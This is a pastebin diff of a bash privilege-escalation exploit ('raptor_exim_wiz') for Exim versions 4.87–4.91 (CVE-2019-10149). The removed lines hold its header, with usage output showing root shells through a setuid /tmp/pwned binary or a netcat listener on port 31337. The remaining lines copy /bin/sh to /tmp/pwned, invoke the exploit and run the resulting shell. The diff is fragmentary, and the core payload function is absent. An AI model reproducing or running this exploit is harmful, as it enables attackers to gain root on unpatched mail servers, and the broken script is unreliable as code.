SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/bin/bash | |
| 2 | METHOD="setuid" # default method | |
| 3 | - | # |
| 3 | + | |
| 4 | - | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit |
| 4 | + | |
| 5 | - | # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> |
| 5 | + | |
| 6 | - | # |
| 6 | + | |
| 7 | - | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). |
| 7 | + | |
| 8 | - | # Improper validation of recipient address in deliver_message() |
| 8 | + | |
| 9 | - | # function in /src/deliver.c may lead to remote command execution. |
| 9 | + | |
| 10 | - | # (CVE-2019-10149) |
| 10 | + | |
| 11 | - | # |
| 11 | + | |
| 12 | - | # This is a local privilege escalation exploit for "The Return |
| 12 | + | |
| 13 | - | # of the WIZard" vulnerability reported by the Qualys Security |
| 13 | + | |
| 14 | - | # Advisory team. |
| 14 | + | |
| 15 | - | # |
| 15 | + | |
| 16 | - | # Credits: |
| 16 | + | |
| 17 | - | # Qualys Security Advisory team (kudos for your amazing research!) |
| 17 | + | |
| 18 | - | # Dennis 'dhn' Herrmann (/dev/tcp technique) |
| 18 | + | |
| 19 | - | # |
| 19 | + | |
| 20 | - | # Usage (setuid method): |
| 20 | + | |
| 21 | - | # $ id |
| 21 | + | |
| 22 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
| 22 | + | |
| 23 | - | # $ ./raptor_exim_wiz -m setuid |
| 23 | + | |
| 24 | - | # Preparing setuid shell helper... |
| 24 | + | |
| 25 | - | # Delivering setuid payload... |
| 25 | + | |
| 26 | - | # [...] |
| 26 | + | |
| 27 | - | # Waiting 5 seconds... |
| 27 | + | |
| 28 | - | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned |
| 28 | + | |
| 29 | - | # # id |
| 29 | + | |
| 30 | - | # uid=0(root) gid=0(root) groups=0(root) |
| 30 | + | |
| 31 | - | # |
| 31 | + | |
| 32 | - | # Usage (netcat method): |
| 32 | + | |
| 33 | - | # $ id |
| 33 | + | |
| 34 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
| 34 | + | |
| 35 | - | # $ ./raptor_exim_wiz -m netcat |
| 35 | + | |
| 36 | - | # Delivering netcat payload... |
| 36 | + | |
| 37 | - | # Waiting 5 seconds... |
| 37 | + | |
| 38 | - | # localhost [127.0.0.1] 31337 (?) open |
| 38 | + | |
| 39 | - | # id |
| 39 | + | |
| 40 | - | # uid=0(root) gid=0(root) groups=0(root) |
| 40 | + | |
| 41 | - | # |
| 41 | + | |
| 42 | - | # Vulnerable platforms: |
| 42 | + | |
| 43 | - | # Exim 4.87 - 4.91 |
| 43 | + | |
| 44 | - | # |
| 44 | + | |
| 45 | - | # Tested against: |
| 45 | + | |
| 46 | - | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] |
| 46 | + | |
| 47 | - | # |
| 47 | + | |
| 48 | echo "Problems compiling setuid shell helper, check your gcc." | |
| 49 | echo "Falling back to the /bin/sh method." | |
| 50 | cp /bin/sh /tmp/pwned | |
| 51 | fi | |
| 52 | echo | |
| 53 | - | # usage instructions |
| 53 | + | |
| 54 | - | function usage() |
| 54 | + | |
| 55 | echo "Delivering $METHOD payload..." | |
| 56 | - | echo "$0 [-m METHOD]" |
| 56 | + | |
| 57 | exploit | |
| 58 | - | echo "-m setuid : use the setuid payload (default)" |
| 58 | + | |
| 59 | - | echo "-m netcat : use the netcat payload" |
| 59 | + | |
| 60 | # wait for the magic to happen and spawn our shell | |
| 61 | - | exit 1 |
| 61 | + | |
| 62 | sleep 5 | |
| 63 | ls -l /tmp/pwned | |
| 64 | /tmp/pwned |
